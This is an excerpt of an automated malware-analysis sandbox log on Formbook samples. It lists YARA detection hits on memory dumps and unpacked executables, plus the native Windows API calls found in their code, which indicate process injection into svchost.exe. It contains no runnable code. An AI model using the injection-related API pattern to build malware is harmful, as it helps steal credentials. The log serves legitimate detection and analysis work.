          Source: 0000001B.00000002.443381775.0000000000D40000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001B.00000002.443381775.0000000000D40000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001C.00000002.444527308.0000000003050000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001C.00000002.444527308.0000000003050000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.198128897.00000000021D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.198128897.00000000021D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001B.00000002.442039105.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001B.00000002.442039105.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001B.00000002.441710972.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001B.00000002.441710972.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.197591617.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.197591617.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.199282148.0000000004180000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.199282148.0000000004180000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.227981004.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.227981004.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.229698791.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.229698791.00000000009A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.464383843.0000000000600000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.464383843.0000000000600000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.233460768.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.233460768.0000000000D10000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001A.00000002.432464043.00000000028D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001A.00000002.432464043.00000000028D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 26.2.nb4dzn5jg.exe.28d0000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 26.2.nb4dzn5jg.exe.28d0000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 27.1.nb4dzn5jg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 27.1.nb4dzn5jg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.eN4poRmfGg.exe.4180000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.eN4poRmfGg.exe.4180000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.eN4poRmfGg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.eN4poRmfGg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 26.2.nb4dzn5jg.exe.4290000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 26.2.nb4dzn5jg.exe.4290000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 26.2.nb4dzn5jg.exe.28d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 26.2.nb4dzn5jg.exe.28d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.eN4poRmfGg.exe.21d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.eN4poRmfGg.exe.21d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 27.2.nb4dzn5jg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 27.2.nb4dzn5jg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 27.2.nb4dzn5jg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 27.2.nb4dzn5jg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.eN4poRmfGg.exe.4180000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.eN4poRmfGg.exe.4180000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 27.1.nb4dzn5jg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 27.1.nb4dzn5jg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.eN4poRmfGg.exe.21d0000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.eN4poRmfGg.exe.21d0000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.eN4poRmfGg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.eN4poRmfGg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.eN4poRmfGg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.eN4poRmfGg.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 26.2.nb4dzn5jg.exe.4290000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 26.2.nb4dzn5jg.exe.4290000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.eN4poRmfGg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.eN4poRmfGg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 0_2_0044E674 NtdllDefWindowProc_A,0_2_0044E674
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 0_2_00433764 NtdllDefWindowProc_A,GetCapture,0_2_00433764
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 0_2_00428B2C NtdllDefWindowProc_A,0_2_00428B2C
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 0_2_0044EDF0 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,0_2_0044EDF0
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 0_2_0044EEA0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,0_2_0044EEA0
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 0_2_00443124 GetSubMenu,SaveDC,RestoreDC,731EB080,SaveDC,RestoreDC,NtdllDefWindowProc_A,0_2_00443124
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00419C90 NtCreateFile,1_2_00419C90
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00419D40 NtReadFile,1_2_00419D40
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00419DC0 NtClose,1_2_00419DC0
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00419E70 NtAllocateVirtualMemory,1_2_00419E70
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00419C8A NtCreateFile,1_2_00419C8A
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00419D3A NtReadFile,1_2_00419D3A
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00419DBA NtClose,1_2_00419DBA
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00419EEA NtAllocateVirtualMemory,1_2_00419EEA
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A498F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00A498F0
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00A49860
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49840 NtDelayExecution,LdrInitializeThunk,1_2_00A49840
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A499A0 NtCreateSection,LdrInitializeThunk,1_2_00A499A0
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00A49910
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49A20 NtResumeThread,LdrInitializeThunk,1_2_00A49A20
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00A49A00
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49A50 NtCreateFile,LdrInitializeThunk,1_2_00A49A50
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A495D0 NtClose,LdrInitializeThunk,1_2_00A495D0
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49540 NtReadFile,LdrInitializeThunk,1_2_00A49540
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A496E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00A496E0
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00A49660
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A497A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00A497A0
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49780 NtMapViewOfSection,LdrInitializeThunk,1_2_00A49780
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49710 NtQueryInformationToken,LdrInitializeThunk,1_2_00A49710
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A498A0 NtWriteVirtualMemory,1_2_00A498A0
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49820 NtEnumerateKey,1_2_00A49820
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A4B040 NtSuspendThread,1_2_00A4B040
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A499D0 NtCreateProcessEx,1_2_00A499D0
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49950 NtQueueApcThread,1_2_00A49950
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49A80 NtOpenDirectoryObject,1_2_00A49A80
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49A10 NtQuerySection,1_2_00A49A10
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A4A3B0 NtGetContextThread,1_2_00A4A3B0
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49B00 NtSetValueKey,1_2_00A49B00
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A495F0 NtQueryInformationFile,1_2_00A495F0
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49520 NtWaitForSingleObject,1_2_00A49520
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A4AD30 NtSetContextThread,1_2_00A4AD30
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49560 NtWriteFile,1_2_00A49560
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A496D0 NtCreateKey,1_2_00A496D0
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49610 NtEnumerateValueKey,1_2_00A49610
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49670 NtQueryInformationProcess,1_2_00A49670
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49650 NtQueryValueKey,1_2_00A49650
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49FE0 NtCreateMutant,1_2_00A49FE0
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49730 NtQueryVirtualMemory,1_2_00A49730
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A4A710 NtOpenProcessToken,1_2_00A4A710
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49760 NtOpenProcess,1_2_00A49760
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A49770 NtSetInformationFile,1_2_00A49770
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_2_00A4A770 NtOpenThread,1_2_00A4A770
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_1_00419C90 NtCreateFile,1_1_00419C90
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_1_00419D40 NtReadFile,1_1_00419D40
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_1_00419DC0 NtClose,1_1_00419DC0
          Source: C:\Users\user\Desktop\eN4poRmfGg.exeCode function: 1_1_00419E70 NtAllocateVirtualMemory,1_1_00419E70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03069B00 NtSetValueKey,LdrInitializeThunk,3_2_03069B00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03069710 NtQueryInformationToken,LdrInitializeThunk,3_2_03069710
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03069770 NtSetInformationFile,LdrInitializeThunk,3_2_03069770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03069780 NtMapViewOfSection,LdrInitializeThunk,3_2_03069780
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03069FE0 NtCreateMutant,LdrInitializeThunk,3_2_03069FE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03069610 NtEnumerateValueKey,LdrInitializeThunk,3_2_03069610
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03069650 NtQueryValueKey,LdrInitializeThunk,3_2_03069650
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03069A50 NtCreateFile,LdrInitializeThunk,3_2_03069A50
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03069660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_03069660
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_030696D0 NtCreateKey,LdrInitializeThunk,3_2_030696D0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_030696E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_030696E0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03069910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_03069910
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03069540 NtReadFile,LdrInitializeThunk,3_2_03069540
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03069560 NtWriteFile,LdrInitializeThunk,3_2_03069560
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_030699A0 NtCreateSection,LdrInitializeThunk,3_2_030699A0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_030695D0 NtClose,LdrInitializeThunk,3_2_030695D0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03069840 NtDelayExecution,LdrInitializeThunk,3_2_03069840
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03069860 NtQuerySystemInformation,LdrInitializeThunk,3_2_03069860
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0306A710 NtOpenProcessToken,3_2_0306A710
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03069730 NtQueryVirtualMemory,3_2_03069730
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03069760 NtOpenProcess,3_2_03069760
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0306A770 NtOpenThread,3_2_0306A770
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_030697A0 NtUnmapViewOfSection,3_2_030697A0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0306A3B0 NtGetContextThread,3_2_0306A3B0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03069A00 NtProtectVirtualMemory,3_2_03069A00
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03069A10 NtQuerySection,3_2_03069A10
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03069A20 NtResumeThread,3_2_03069A20
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03069670 NtQueryInformationProcess,3_2_03069670
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03069A80 NtOpenDirectoryObject,3_2_03069A80
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03069520 NtWaitForSingleObject,3_2_03069520
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0306AD30 NtSetContextThread,3_2_0306AD30
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03069950 NtQueueApcThread,3_2_03069950
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_030699D0 NtCreateProcessEx,3_2_030699D0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_030695F0 NtQueryInformationFile,3_2_030695F0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03069820 NtEnumerateKey,3_2_03069820
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0306B040 NtSuspendThread,3_2_0306B040
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_030698A0 NtWriteVirtualMemory,3_2_030698A0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_030698F0 NtReadVirtualMemory,3_2_030698F0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02A89E70 NtAllocateVirtualMemory,3_2_02A89E70
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02A89C90 NtCreateFile,3_2_02A89C90
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02A89DC0 NtClose,3_2_02A89DC0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02A89D40 NtReadFile,3_2_02A89D40
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02A89EEA NtAllocateVirtualMemory,3_2_02A89EEA
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02A89C8A NtCreateFile,3_2_02A89C8A
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02A89DBA NtClose,3_2_02A89DBA
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_02A89D3A NtReadFile,3_2_02A89D3A
          Source: C:\Program Files (x86)\Dbnudz\nb4dzn5jg.exe | Code function: 26_2_0044E674 NtdllDefWindowProc_A,26_2_0044E674
          Source: C:\Program Files (x86)\Dbnudz\nb4dzn5jg.exe | Code function: 26_2_00433764 NtdllDefWindowProc_A,GetCapture,26_2_00433764
          Source: C:\Program Files (x86)\Dbnudz\nb4dzn5jg.exe | Code function: 26_2_00428B2C NtdllDefWindowProc_A,26_2_00428B2C
          Source: C:\Program Files (x86)\Dbnudz\nb4dzn5jg.exe | Code function: 26_2_0044EDF0 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,26_2_0044EDF0